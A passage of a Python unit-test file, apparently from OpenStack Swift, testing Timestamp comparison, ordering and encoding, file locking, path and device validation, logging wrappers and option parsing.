maximum = expected + tolerance for value in test_values: timestamp = utils.Timestamp(value) self.assertTrue(float(timestamp) > minimum, '%f is not bigger than %f given %r' % ( timestamp, minimum, value)) self.assertTrue(float(timestamp) < maximum, '%f is not smaller than %f given %r' % ( timestamp, maximum, value)) # direct comparison of timestamp works too self.assertTrue(timestamp > minimum, '%s is not bigger than %f given %r' % ( timestamp.normal, minimum, value)) self.assertTrue(timestamp < maximum, '%s is not smaller than %f given %r' % ( timestamp.normal, maximum, value)) # ... even against strings self.assertTrue(timestamp > '%f' % minimum, '%s is not bigger than %s given %r' % ( timestamp.normal, minimum, value)) self.assertTrue(timestamp < '%f' % maximum, '%s is not smaller than %s given %r' % ( timestamp.normal, maximum, value)) def test_false(self): self.assertFalse(utils.Timestamp(0)) self.assertFalse(utils.Timestamp(0, offset=0)) self.assertFalse(utils.Timestamp('0')) self.assertFalse(utils.Timestamp('0', offset=0)) self.assertFalse(utils.Timestamp(0.0)) self.assertFalse(utils.Timestamp(0.0, offset=0)) self.assertFalse(utils.Timestamp('0.0')) self.assertFalse(utils.Timestamp('0.0', offset=0)) self.assertFalse(utils.Timestamp(00000000.00000000)) self.assertFalse(utils.Timestamp(00000000.00000000, offset=0)) self.assertFalse(utils.Timestamp('00000000.00000000')) self.assertFalse(utils.Timestamp('00000000.00000000', offset=0)) def test_true(self): self.assertTrue(utils.Timestamp(1)) self.assertTrue(utils.Timestamp(1, offset=1)) self.assertTrue(utils.Timestamp(0, offset=1)) self.assertTrue(utils.Timestamp('1')) self.assertTrue(utils.Timestamp('1', offset=1)) self.assertTrue(utils.Timestamp('0', offset=1)) self.assertTrue(utils.Timestamp(1.1)) self.assertTrue(utils.Timestamp(1.1, offset=1)) self.assertTrue(utils.Timestamp(0.0, offset=1)) self.assertTrue(utils.Timestamp('1.1')) self.assertTrue(utils.Timestamp('1.1', offset=1)) self.assertTrue(utils.Timestamp('0.0', offset=1)) self.assertTrue(utils.Timestamp(11111111.11111111)) self.assertTrue(utils.Timestamp(11111111.11111111, offset=1)) self.assertTrue(utils.Timestamp(00000000.00000000, offset=1)) self.assertTrue(utils.Timestamp('11111111.11111111')) self.assertTrue(utils.Timestamp('11111111.11111111', offset=1)) self.assertTrue(utils.Timestamp('00000000.00000000', offset=1)) def test_greater_no_offset(self): now = time.time() older = now - 1 timestamp = utils.Timestamp(now) test_values = ( 0, '0', 0.0, '0.0', '0000.0000', '000.000_000', 1, '1', 1.1, '1.1', '1111.1111', '111.111_111', 1402443112.213252, '1402443112.213252', '1402443112.213252_ffff', older, '%f' % older, '%f_0000ffff' % older, ) for value in test_values: other = utils.Timestamp(value) self.assertNotEqual(timestamp, other) # sanity self.assertTrue(timestamp > value, '%r is not greater than %r given %r' % ( timestamp, value, value)) self.assertTrue(timestamp > other, '%r is not greater than %r given %r' % ( timestamp, other, value)) self.assertTrue(timestamp > other.normal, '%r is not greater than %r given %r' % ( timestamp, other.normal, value)) self.assertTrue(timestamp > other.internal, '%r is not greater than %r given %r' % ( timestamp, other.internal, value)) self.assertTrue(timestamp > float(other), '%r is not greater than %r given %r' % ( timestamp, float(other), value)) self.assertTrue(timestamp > int(other), '%r is not greater than %r given %r' % ( timestamp, int(other), value)) def _test_greater_with_offset(self, now, test_values): for offset in range(1, 
1000, 100): timestamp = utils.Timestamp(now, offset=offset) for value in test_values: other = utils.Timestamp(value) self.assertNotEqual(timestamp, other) # sanity self.assertTrue(timestamp > value, '%r is not greater than %r given %r' % ( timestamp, value, value)) self.assertTrue(timestamp > other, '%r is not greater than %r given %r' % ( timestamp, other, value)) self.assertTrue(timestamp > other.normal, '%r is not greater than %r given %r' % ( timestamp, other.normal, value)) self.assertTrue(timestamp > other.internal, '%r is not greater than %r given %r' % ( timestamp, other.internal, value)) self.assertTrue(timestamp > float(other), '%r is not greater than %r given %r' % ( timestamp, float(other), value)) self.assertTrue(timestamp > int(other), '%r is not greater than %r given %r' % ( timestamp, int(other), value)) def test_greater_with_offset(self): # Part 1: use the natural time of the Python. This is deliciously # unpredictable, but completely legitimate and realistic. Finds bugs! now = time.time() older = now - 1 test_values = ( 0, '0', 0.0, '0.0', '0000.0000', '000.000_000', 1, '1', 1.1, '1.1', '1111.1111', '111.111_111', 1402443346.935174, '1402443346.93517', '1402443346.935169_ffff', older, now, ) self._test_greater_with_offset(now, test_values) # Part 2: Same as above, but with fixed time values that reproduce # specific corner cases. now = 1519830570.6949348 older = now - 1 test_values = ( 0, '0', 0.0, '0.0', '0000.0000', '000.000_000', 1, '1', 1.1, '1.1', '1111.1111', '111.111_111', 1402443346.935174, '1402443346.93517', '1402443346.935169_ffff', older, now, ) self._test_greater_with_offset(now, test_values) # Part 3: The '%f' problem. Timestamps cannot be converted to %f # strings, then back to timestamps, then compared with originals. # You can only "import" a floating point representation once. 
now = 1519830570.6949348 now = float('%f' % now) older = now - 1 test_values = ( 0, '0', 0.0, '0.0', '0000.0000', '000.000_000', 1, '1', 1.1, '1.1', '1111.1111', '111.111_111', older, '%f' % older, '%f_0000ffff' % older, now, '%f' % now, '%s_00000000' % now, ) self._test_greater_with_offset(now, test_values) def test_smaller_no_offset(self): now = time.time() newer = now + 1 timestamp = utils.Timestamp(now) test_values = ( 9999999999.99999, '9999999999.99999', '9999999999.99999_ffff', newer, '%f' % newer, '%f_0000ffff' % newer, ) for value in test_values: other = utils.Timestamp(value) self.assertNotEqual(timestamp, other) # sanity self.assertTrue(timestamp < value, '%r is not smaller than %r given %r' % ( timestamp, value, value)) self.assertTrue(timestamp < other, '%r is not smaller than %r given %r' % ( timestamp, other, value)) self.assertTrue(timestamp < other.normal, '%r is not smaller than %r given %r' % ( timestamp, other.normal, value)) self.assertTrue(timestamp < other.internal, '%r is not smaller than %r given %r' % ( timestamp, other.internal, value)) self.assertTrue(timestamp < float(other), '%r is not smaller than %r given %r' % ( timestamp, float(other), value)) self.assertTrue(timestamp < int(other), '%r is not smaller than %r given %r' % ( timestamp, int(other), value)) def test_smaller_with_offset(self): now = time.time() newer = now + 1 test_values = ( 9999999999.99999, '9999999999.99999', '9999999999.99999_ffff', newer, '%f' % newer, '%f_0000ffff' % newer, ) for offset in range(1, 1000, 100): timestamp = utils.Timestamp(now, offset=offset) for value in test_values: other = utils.Timestamp(value) self.assertNotEqual(timestamp, other) # sanity self.assertTrue(timestamp < value, '%r is not smaller than %r given %r' % ( timestamp, value, value)) self.assertTrue(timestamp < other, '%r is not smaller than %r given %r' % ( timestamp, other, value)) self.assertTrue(timestamp < other.normal, '%r is not smaller than %r given %r' % ( timestamp, other.normal, value)) self.assertTrue(timestamp < other.internal, '%r is not smaller than %r given %r' % ( timestamp, other.internal, value)) self.assertTrue(timestamp < float(other), '%r is not smaller than %r given %r' % ( timestamp, float(other), value)) self.assertTrue(timestamp < int(other), '%r is not smaller than %r given %r' % ( timestamp, int(other), value)) def test_cmp_with_none(self): self.assertGreater(utils.Timestamp(0), None) self.assertGreater(utils.Timestamp(1.0), None) self.assertGreater(utils.Timestamp(1.0, 42), None) def test_ordering(self): given = [ '1402444820.62590_000000000000000a', '1402444820.62589_0000000000000001', '1402444821.52589_0000000000000004', '1402444920.62589_0000000000000004', '1402444821.62589_000000000000000a', '1402444821.72589_000000000000000a', '1402444920.62589_0000000000000002', '1402444820.62589_0000000000000002', '1402444820.62589_000000000000000a', '1402444820.62590_0000000000000004', '1402444920.62589_000000000000000a', '1402444820.62590_0000000000000002', '1402444821.52589_0000000000000002', '1402444821.52589_0000000000000000', '1402444920.62589', '1402444821.62589_0000000000000004', '1402444821.72589_0000000000000001', '1402444820.62590', '1402444820.62590_0000000000000001', '1402444820.62589_0000000000000004', '1402444821.72589_0000000000000000', '1402444821.52589_000000000000000a', '1402444821.72589_0000000000000004', '1402444821.62589', '1402444821.52589_0000000000000001', '1402444821.62589_0000000000000001', '1402444821.62589_0000000000000002', '1402444821.72589_0000000000000002', 
'1402444820.62589', '1402444920.62589_0000000000000001'] expected = [ '1402444820.62589', '1402444820.62589_0000000000000001', '1402444820.62589_0000000000000002', '1402444820.62589_0000000000000004', '1402444820.62589_000000000000000a', '1402444820.62590', '1402444820.62590_0000000000000001', '1402444820.62590_0000000000000002', '1402444820.62590_0000000000000004', '1402444820.62590_000000000000000a', '1402444821.52589', '1402444821.52589_0000000000000001', '1402444821.52589_0000000000000002', '1402444821.52589_0000000000000004', '1402444821.52589_000000000000000a', '1402444821.62589', '1402444821.62589_0000000000000001', '1402444821.62589_0000000000000002', '1402444821.62589_0000000000000004', '1402444821.62589_000000000000000a', '1402444821.72589', '1402444821.72589_0000000000000001', '1402444821.72589_0000000000000002', '1402444821.72589_0000000000000004', '1402444821.72589_000000000000000a', '1402444920.62589', '1402444920.62589_0000000000000001', '1402444920.62589_0000000000000002', '1402444920.62589_0000000000000004', '1402444920.62589_000000000000000a', ] # less visual version """ now = time.time() given = [ utils.Timestamp(now + i, offset=offset).internal for i in (0, 0.00001, 0.9, 1.0, 1.1, 100.0) for offset in (0, 1, 2, 4, 10) ] expected = [t for t in given] random.shuffle(given) """ self.assertEqual(len(given), len(expected)) # sanity timestamps = [utils.Timestamp(t) for t in given] # our expected values don't include insignificant offsets with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False): self.assertEqual( [t.internal for t in sorted(timestamps)], expected) # string sorting works as well self.assertEqual( sorted([t.internal for t in timestamps]), expected) def test_hashable(self): ts_0 = utils.Timestamp('1402444821.72589') ts_0_also = utils.Timestamp('1402444821.72589') self.assertEqual(ts_0, ts_0_also) # sanity self.assertEqual(hash(ts_0), hash(ts_0_also)) d = {ts_0: 'whatever'} self.assertIn(ts_0, d) # sanity self.assertIn(ts_0_also, d) def test_out_of_range_comparisons(self): now = utils.Timestamp.now() def check_is_later(val): self.assertTrue(now != val) self.assertFalse(now == val) self.assertTrue(now <= val) self.assertTrue(now < val) self.assertTrue(val > now) self.assertTrue(val >= now) check_is_later(1e30) check_is_later(1579753284000) # someone gave us ms instead of s! 
check_is_later('1579753284000') check_is_later(b'1e15') check_is_later(u'1.e+10_f') def check_is_earlier(val): self.assertTrue(now != val) self.assertFalse(now == val) self.assertTrue(now >= val) self.assertTrue(now > val) self.assertTrue(val < now) self.assertTrue(val <= now) check_is_earlier(-1) check_is_earlier(-0.1) check_is_earlier('-9999999') check_is_earlier(b'-9999.999') check_is_earlier(u'-1234_5678') def test_inversion(self): ts = utils.Timestamp(0) self.assertIsInstance(~ts, utils.Timestamp) self.assertEqual((~ts).internal, '9999999999.99999') ts = utils.Timestamp(123456.789) self.assertIsInstance(~ts, utils.Timestamp) self.assertEqual(ts.internal, '0000123456.78900') self.assertEqual((~ts).internal, '9999876543.21099') timestamps = sorted(utils.Timestamp(random.random() * 1e10) for _ in range(20)) self.assertEqual([x.internal for x in timestamps], sorted(x.internal for x in timestamps)) self.assertEqual([(~x).internal for x in reversed(timestamps)], sorted((~x).internal for x in timestamps)) ts = utils.Timestamp.now() self.assertGreater(~ts, ts) # NB: will break around 2128 ts = utils.Timestamp.now(offset=1) with self.assertRaises(ValueError) as caught: ~ts self.assertEqual(caught.exception.args[0], 'Cannot invert timestamps with offsets') class TestTimestampEncoding(unittest.TestCase): def setUp(self): t0 = utils.Timestamp(0.0) t1 = utils.Timestamp(997.9996) t2 = utils.Timestamp(999) t3 = utils.Timestamp(1000, 24) t4 = utils.Timestamp(1001) t5 = utils.Timestamp(1002.00040) # encodings that are expected when explicit = False self.non_explicit_encodings = ( ('0000001000.00000_18', (t3, t3, t3)), ('0000001000.00000_18', (t3, t3, None)), ) # mappings that are expected when explicit = True self.explicit_encodings = ( ('0000001000.00000_18+0+0', (t3, t3, t3)), ('0000001000.00000_18+0', (t3, t3, None)), ) # mappings that are expected when explicit = True or False self.encodings = ( ('0000001000.00000_18+0+186a0', (t3, t3, t4)), ('0000001000.00000_18+186a0+186c8', (t3, t4, t5)), ('0000001000.00000_18-186a0+0', (t3, t2, t2)), ('0000001000.00000_18+0-186a0', (t3, t3, t2)), ('0000001000.00000_18-186a0-186c8', (t3, t2, t1)), ('0000001000.00000_18', (t3, None, None)), ('0000001000.00000_18+186a0', (t3, t4, None)), ('0000001000.00000_18-186a0', (t3, t2, None)), ('0000001000.00000_18', (t3, None, t1)), ('0000001000.00000_18-5f5e100', (t3, t0, None)), ('0000001000.00000_18+0-5f5e100', (t3, t3, t0)), ('0000001000.00000_18-5f5e100+5f45a60', (t3, t0, t2)), ) # decodings that are expected when explicit = False self.non_explicit_decodings = ( ('0000001000.00000_18', (t3, t3, t3)), ('0000001000.00000_18+186a0', (t3, t4, t4)), ('0000001000.00000_18-186a0', (t3, t2, t2)), ('0000001000.00000_18+186a0', (t3, t4, t4)), ('0000001000.00000_18-186a0', (t3, t2, t2)), ('0000001000.00000_18-5f5e100', (t3, t0, t0)), ) # decodings that are expected when explicit = True self.explicit_decodings = ( ('0000001000.00000_18+0+0', (t3, t3, t3)), ('0000001000.00000_18+0', (t3, t3, None)), ('0000001000.00000_18', (t3, None, None)), ('0000001000.00000_18+186a0', (t3, t4, None)), ('0000001000.00000_18-186a0', (t3, t2, None)), ('0000001000.00000_18-5f5e100', (t3, t0, None)), ) # decodings that are expected when explicit = True or False self.decodings = ( ('0000001000.00000_18+0+186a0', (t3, t3, t4)), ('0000001000.00000_18+186a0+186c8', (t3, t4, t5)), ('0000001000.00000_18-186a0+0', (t3, t2, t2)), ('0000001000.00000_18+0-186a0', (t3, t3, t2)), ('0000001000.00000_18-186a0-186c8', (t3, t2, t1)), 
('0000001000.00000_18-5f5e100+5f45a60', (t3, t0, t2)), ) def _assertEqual(self, expected, actual, test): self.assertEqual(expected, actual, 'Got %s but expected %s for parameters %s' % (actual, expected, test)) def test_encoding(self): for test in self.explicit_encodings: actual = utils.encode_timestamps(test[1][0], test[1][1], test[1][2], True) self._assertEqual(test[0], actual, test[1]) for test in self.non_explicit_encodings: actual = utils.encode_timestamps(test[1][0], test[1][1], test[1][2], False) self._assertEqual(test[0], actual, test[1]) for explicit in (True, False): for test in self.encodings: actual = utils.encode_timestamps(test[1][0], test[1][1], test[1][2], explicit) self._assertEqual(test[0], actual, test[1]) def test_decoding(self): for test in self.explicit_decodings: actual = utils.decode_timestamps(test[0], True) self._assertEqual(test[1], actual, test[0]) for test in self.non_explicit_decodings: actual = utils.decode_timestamps(test[0], False) self._assertEqual(test[1], actual, test[0]) for explicit in (True, False): for test in self.decodings: actual = utils.decode_timestamps(test[0], explicit) self._assertEqual(test[1], actual, test[0]) class TestUtils(unittest.TestCase): """Tests for swift.common.utils """ def setUp(self): utils.HASH_PATH_SUFFIX = b'endcap' utils.HASH_PATH_PREFIX = b'startcap' def test_get_zero_indexed_base_string(self): self.assertEqual(utils.get_zero_indexed_base_string('something', 0), 'something') self.assertEqual(utils.get_zero_indexed_base_string('something', None), 'something') self.assertEqual(utils.get_zero_indexed_base_string('something', 1), 'something-1') self.assertRaises(ValueError, utils.get_zero_indexed_base_string, 'something', 'not_integer') @with_tempdir def test_lock_path(self, tmpdir): # 2 locks with limit=1 must fail success = False with utils.lock_path(tmpdir, 0.1): with self.assertRaises(LockTimeout): with utils.lock_path(tmpdir, 0.1): success = True self.assertFalse(success) # 2 locks with limit=2 must succeed success = False with utils.lock_path(tmpdir, 0.1, limit=2): try: with utils.lock_path(tmpdir, 0.1, limit=2): success = True except LockTimeout as exc: self.fail('Unexpected exception %s' % exc) self.assertTrue(success) # 3 locks with limit=2 must fail success = False with utils.lock_path(tmpdir, 0.1, limit=2): with utils.lock_path(tmpdir, 0.1, limit=2): with self.assertRaises(LockTimeout): with utils.lock_path(tmpdir, 0.1): success = True self.assertFalse(success) @with_tempdir def test_lock_path_invalid_limit(self, tmpdir): success = False with self.assertRaises(ValueError): with utils.lock_path(tmpdir, 0.1, limit=0): success = True self.assertFalse(success) with self.assertRaises(ValueError): with utils.lock_path(tmpdir, 0.1, limit=-1): success = True self.assertFalse(success) with self.assertRaises(TypeError): with utils.lock_path(tmpdir, 0.1, limit='1'): success = True self.assertFalse(success) with self.assertRaises(TypeError): with utils.lock_path(tmpdir, 0.1, limit=1.1): success = True self.assertFalse(success) @with_tempdir def test_lock_path_num_sleeps(self, tmpdir): num_short_calls = [0] exception_raised = [False] def my_sleep(to_sleep): if to_sleep == 0.01: num_short_calls[0] += 1 else: raise Exception('sleep time changed: %s' % to_sleep) try: with mock.patch('swift.common.utils.sleep', my_sleep): with utils.lock_path(tmpdir): with utils.lock_path(tmpdir): pass except Exception as e: exception_raised[0] = True self.assertTrue('sleep time changed' in str(e)) self.assertEqual(num_short_calls[0], 11) 
self.assertTrue(exception_raised[0]) @with_tempdir def test_lock_path_class(self, tmpdir): with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout): exc = None exc2 = None success = False try: with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout): success = True except ReplicationLockTimeout as err: exc = err except LockTimeout as err: exc2 = err self.assertTrue(exc is not None) self.assertTrue(exc2 is None) self.assertTrue(not success) exc = None exc2 = None success = False try: with utils.lock_path(tmpdir, 0.1): success = True except ReplicationLockTimeout as err: exc = err except LockTimeout as err: exc2 = err self.assertTrue(exc is None) self.assertTrue(exc2 is not None) self.assertTrue(not success) @with_tempdir def test_lock_path_name(self, tmpdir): # With default limit (1), can't take the same named lock twice success = False with utils.lock_path(tmpdir, 0.1, name='foo'): with self.assertRaises(LockTimeout): with utils.lock_path(tmpdir, 0.1, name='foo'): success = True self.assertFalse(success) # With default limit (1), can take two differently named locks success = False with utils.lock_path(tmpdir, 0.1, name='foo'): with utils.lock_path(tmpdir, 0.1, name='bar'): success = True self.assertTrue(success) # With default limit (1), can take a named lock and the default lock success = False with utils.lock_path(tmpdir, 0.1, name='foo'): with utils.lock_path(tmpdir, 0.1): success = True self.assertTrue(success) def test_normalize_timestamp(self): # Test swift.common.utils.normalize_timestamp self.assertEqual(utils.normalize_timestamp('1253327593.48174'), "1253327593.48174") self.assertEqual(utils.normalize_timestamp(1253327593.48174), "1253327593.48174") self.assertEqual(utils.normalize_timestamp('1253327593.48'), "1253327593.48000") self.assertEqual(utils.normalize_timestamp(1253327593.48), "1253327593.48000") self.assertEqual(utils.normalize_timestamp('253327593.48'), "0253327593.48000") self.assertEqual(utils.normalize_timestamp(253327593.48), "0253327593.48000") self.assertEqual(utils.normalize_timestamp('1253327593'), "1253327593.00000") self.assertEqual(utils.normalize_timestamp(1253327593), "1253327593.00000") self.assertRaises(ValueError, utils.normalize_timestamp, '') self.assertRaises(ValueError, utils.normalize_timestamp, 'abc') def test_normalize_delete_at_timestamp(self): self.assertEqual( utils.normalize_delete_at_timestamp(1253327593), '1253327593') self.assertEqual( utils.normalize_delete_at_timestamp(1253327593.67890), '1253327593') self.assertEqual( utils.normalize_delete_at_timestamp('1253327593'), '1253327593') self.assertEqual( utils.normalize_delete_at_timestamp('1253327593.67890'), '1253327593') self.assertEqual( utils.normalize_delete_at_timestamp(-1253327593), '0000000000') self.assertEqual( utils.normalize_delete_at_timestamp(-1253327593.67890), '0000000000') self.assertEqual( utils.normalize_delete_at_timestamp('-1253327593'), '0000000000') self.assertEqual( utils.normalize_delete_at_timestamp('-1253327593.67890'), '0000000000') self.assertEqual( utils.normalize_delete_at_timestamp(71253327593), '9999999999') self.assertEqual( utils.normalize_delete_at_timestamp(71253327593.67890), '9999999999') self.assertEqual( utils.normalize_delete_at_timestamp('71253327593'), '9999999999') self.assertEqual( utils.normalize_delete_at_timestamp('71253327593.67890'), '9999999999') self.assertRaises(ValueError, utils.normalize_timestamp, '') self.assertRaises(ValueError, utils.normalize_timestamp, 'abc') def test_last_modified_date_to_timestamp(self): expectations = { 
'1970-01-01T00:00:00.000000': 0.0, '2014-02-28T23:22:36.698390': 1393629756.698390, '2011-03-19T04:03:00.604554': 1300507380.604554, } for last_modified, ts in expectations.items(): real = utils.last_modified_date_to_timestamp(last_modified) self.assertEqual(real, ts, "failed for %s" % last_modified) def test_last_modified_date_to_timestamp_when_system_not_UTC(self): try: old_tz = os.environ.get('TZ') # Western Argentina Summer Time. Found in glibc manual; this # timezone always has a non-zero offset from UTC, so this test is # always meaningful. os.environ['TZ'] = 'WART4WARST,J1/0,J365/25' self.assertEqual(utils.last_modified_date_to_timestamp( '1970-01-01T00:00:00.000000'), 0.0) finally: if old_tz is not None: os.environ['TZ'] = old_tz else: os.environ.pop('TZ') def test_backwards(self): # Test swift.common.utils.backward # The lines are designed so that the function would encounter # all of the boundary conditions and typical conditions. # Block boundaries are marked with '<>' characters blocksize = 25 lines = [b'123456789x12345678><123456789\n', # block larger than rest b'123456789x123>\n', # block ends just before \n character b'123423456789\n', b'123456789x\n', # block ends at the end of line b'<123456789x123456789x123\n', b'<6789x123\n', # block ends at the beginning of the line b'6789x1234\n', b'1234><234\n', # block ends typically in the middle of line b'123456789x123456789\n'] with TemporaryFile() as f: for line in lines: f.write(line) count = len(lines) - 1 for line in utils.backward(f, blocksize): self.assertEqual(line, lines[count].split(b'\n')[0]) count -= 1 # Empty file case with TemporaryFile('r') as f: self.assertEqual([], list(utils.backward(f))) def test_mkdirs(self): testdir_base = mkdtemp() testroot = os.path.join(testdir_base, 'mkdirs') try: self.assertTrue(not os.path.exists(testroot)) utils.mkdirs(testroot) self.assertTrue(os.path.exists(testroot)) utils.mkdirs(testroot) self.assertTrue(os.path.exists(testroot)) rmtree(testroot, ignore_errors=1) testdir = os.path.join(testroot, 'one/two/three') self.assertTrue(not os.path.exists(testdir)) utils.mkdirs(testdir) self.assertTrue(os.path.exists(testdir)) utils.mkdirs(testdir) self.assertTrue(os.path.exists(testdir)) rmtree(testroot, ignore_errors=1) open(testroot, 'wb').close() self.assertTrue(not os.path.exists(testdir)) self.assertRaises(OSError, utils.mkdirs, testdir) os.unlink(testroot) finally: rmtree(testdir_base) def test_split_path(self): # Test swift.common.utils.split_account_path self.assertRaises(ValueError, utils.split_path, '') self.assertRaises(ValueError, utils.split_path, '/') self.assertRaises(ValueError, utils.split_path, '//') self.assertEqual(utils.split_path('/a'), ['a']) self.assertRaises(ValueError, utils.split_path, '//a') self.assertEqual(utils.split_path('/a/'), ['a']) self.assertRaises(ValueError, utils.split_path, '/a/c') self.assertRaises(ValueError, utils.split_path, '//c') self.assertRaises(ValueError, utils.split_path, '/a/c/') self.assertRaises(ValueError, utils.split_path, '/a//') self.assertRaises(ValueError, utils.split_path, '/a', 2) self.assertRaises(ValueError, utils.split_path, '/a', 2, 3) self.assertRaises(ValueError, utils.split_path, '/a', 2, 3, True) self.assertEqual(utils.split_path('/a/c', 2), ['a', 'c']) self.assertEqual(utils.split_path('/a/c/o', 3), ['a', 'c', 'o']) self.assertRaises(ValueError, utils.split_path, '/a/c/o/r', 3, 3) self.assertEqual(utils.split_path('/a/c/o/r', 3, 3, True), ['a', 'c', 'o/r']) self.assertEqual(utils.split_path('/a/c', 2, 3, True), ['a', 
'c', None]) self.assertRaises(ValueError, utils.split_path, '/a', 5, 4) self.assertEqual(utils.split_path('/a/c/', 2), ['a', 'c']) self.assertEqual(utils.split_path('/a/c/', 2, 3), ['a', 'c', '']) try: utils.split_path('o\nn e', 2) except ValueError as err: self.assertEqual(str(err), 'Invalid path: o%0An%20e') try: utils.split_path('o\nn e', 2, 3, True) except ValueError as err: self.assertEqual(str(err), 'Invalid path: o%0An%20e') def test_validate_device_partition(self): # Test swift.common.utils.validate_device_partition utils.validate_device_partition('foo', 'bar') self.assertRaises(ValueError, utils.validate_device_partition, '', '') self.assertRaises(ValueError, utils.validate_device_partition, '', 'foo') self.assertRaises(ValueError, utils.validate_device_partition, 'foo', '') self.assertRaises(ValueError, utils.validate_device_partition, 'foo/bar', 'foo') self.assertRaises(ValueError, utils.validate_device_partition, 'foo', 'foo/bar') self.assertRaises(ValueError, utils.validate_device_partition, '.', 'foo') self.assertRaises(ValueError, utils.validate_device_partition, '..', 'foo') self.assertRaises(ValueError, utils.validate_device_partition, 'foo', '.') self.assertRaises(ValueError, utils.validate_device_partition, 'foo', '..') try: utils.validate_device_partition('o\nn e', 'foo') except ValueError as err: self.assertEqual(str(err), 'Invalid device: o%0An%20e') try: utils.validate_device_partition('foo', 'o\nn e') except ValueError as err: self.assertEqual(str(err), 'Invalid partition: o%0An%20e') def test_NullLogger(self): # Test swift.common.utils.NullLogger sio = StringIO() nl = utils.NullLogger() nl.write('test') self.assertEqual(sio.getvalue(), '') def test_LoggerFileObject(self): orig_stdout = sys.stdout orig_stderr = sys.stderr sio = StringIO() handler = logging.StreamHandler(sio) logger = logging.getLogger() logger.addHandler(handler) lfo_stdout = utils.LoggerFileObject(logger) lfo_stderr = utils.LoggerFileObject(logger, 'STDERR') print('test1') self.assertEqual(sio.getvalue(), '') sys.stdout = lfo_stdout print('test2') self.assertEqual(sio.getvalue(), 'STDOUT: test2\n') sys.stderr = lfo_stderr print('test4', file=sys.stderr) self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n') sys.stdout = orig_stdout print('test5') self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n') print('test6', file=sys.stderr) self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n' 'STDERR: test6\n') sys.stderr = orig_stderr print('test8') self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n' 'STDERR: test6\n') lfo_stdout.writelines(['a', 'b', 'c']) self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n' 'STDERR: test6\nSTDOUT: a#012b#012c\n') lfo_stdout.close() lfo_stderr.close() lfo_stdout.write('d') self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n' 'STDERR: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n') lfo_stdout.flush() self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n' 'STDERR: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n') for lfo in (lfo_stdout, lfo_stderr): got_exc = False try: for line in lfo: pass except Exception: got_exc = True self.assertTrue(got_exc) got_exc = False try: for line in lfo: pass except Exception: got_exc = True self.assertTrue(got_exc) self.assertRaises(IOError, lfo.read) self.assertRaises(IOError, lfo.read, 1024) self.assertRaises(IOError, lfo.readline) self.assertRaises(IOError, lfo.readline, 1024) lfo.tell() def test_LoggerFileObject_recursion(self): crashy_calls = [0] class 
CrashyLogger(logging.Handler): def emit(self, record): crashy_calls[0] += 1 try: # Pretend to be trying to send to syslog, but syslogd is # dead. We need the raise here to set sys.exc_info. raise socket.error(errno.ENOTCONN, "This is an ex-syslog") except socket.error: self.handleError(record) logger = logging.getLogger() logger.addHandler(CrashyLogger()) # Set up some real file descriptors for stdio. If you run # nosetests with "-s", you already have real files there, but # otherwise they're StringIO objects. # # In any case, since capture_stdio() closes sys.stdin and friends, # we'd want to set up some sacrificial files so as to not goof up # the testrunner. new_stdin = open(os.devnull, 'r+b') new_stdout = open(os.devnull, 'w+b') new_stderr = open(os.devnull, 'w+b') with contextlib.closing(new_stdin), contextlib.closing(new_stdout), \ contextlib.closing(new_stderr): # logging.raiseExceptions is set to False in test/__init__.py, but # is True in Swift daemons, and the error doesn't manifest without # it. with mock.patch('sys.stdin', new_stdin), \ mock.patch('sys.stdout', new_stdout), \ mock.patch('sys.stderr', new_stderr), \ mock.patch.object(logging, 'raiseExceptions', True): # Note: since stdio is hooked up to /dev/null in here, using # pdb is basically impossible. Sorry about that. utils.capture_stdio(logger) logger.info("I like ham") self.assertGreater(crashy_calls[0], 1) def test_parse_options(self): # Get a file that is definitely on disk with NamedTemporaryFile() as f: conf_file = f.name conf, options = utils.parse_options(test_args=[conf_file]) self.assertEqual(conf, conf_file) # assert defaults self.assertEqual(options['verbose'], False) self.assertNotIn('once', options) # assert verbose as option conf, options = utils.parse_options(test_args=[conf_file, '-v']) self.assertEqual(options['verbose'], True) # check once option conf, options = utils.parse_options(test_args=[conf_file], once=True) self.assertEqual(options['once'], False) test_args = [conf_file, '--once'] conf, options = utils.parse_options(test_args=test_args, once=True) self.assertEqual(options['once'], True) # check options as arg parsing test_args = [conf_file, 'once', 'plugin_name', 'verbose'] conf, options = utils.parse_options(test_args=test_args, once=True) self.assertEqual(options['verbose'], True) self.assertEqual(options['once'], True) self.assertEqual(options['extra_args'], ['plugin_name']) def test_parse_options_errors(self): orig_stdout = sys.stdout orig_stderr = sys.stderr stdo = StringIO() stde = StringIO() utils.sys.stdout = stdo utils.sys.stderr = stde self.assertRaises(SystemExit, utils.parse_options, once=True, test_args=[]) self.assertTrue('missing config' in stdo.getvalue()) # verify conf file must exist, context manager will delete temp file with NamedTemporaryFile() as f: conf_file = f.name self.assertRaises(SystemExit, utils.parse_options, once=True, test_args=[conf_file]) self.assertTrue('unable to locate' in stdo.getvalue()) # reset stdio utils.sys.stdout = orig_stdout utils.sys.stderr = orig_stderr def test_dump_recon_cache(self): testdir_base = mkdtemp() testcache_file = os.path.join(testdir_base, 'cache.recon') logger = utils.get_logger(None, 'server', log_route='server') try: submit_dict = {'key0': 99, 'key1': {'value1': 1, 'value2': 2}} utils.dump_recon_cache(submit_dict, testcache_file, logger) with open(testcache_file) as fd: file_dict = json.loads(fd.readline()) self.assertEqual(submit_dict, file_dict) # Use a nested entry submit_dict = {'key0': 101, 'key1': {'key2': {'value1': 1, 
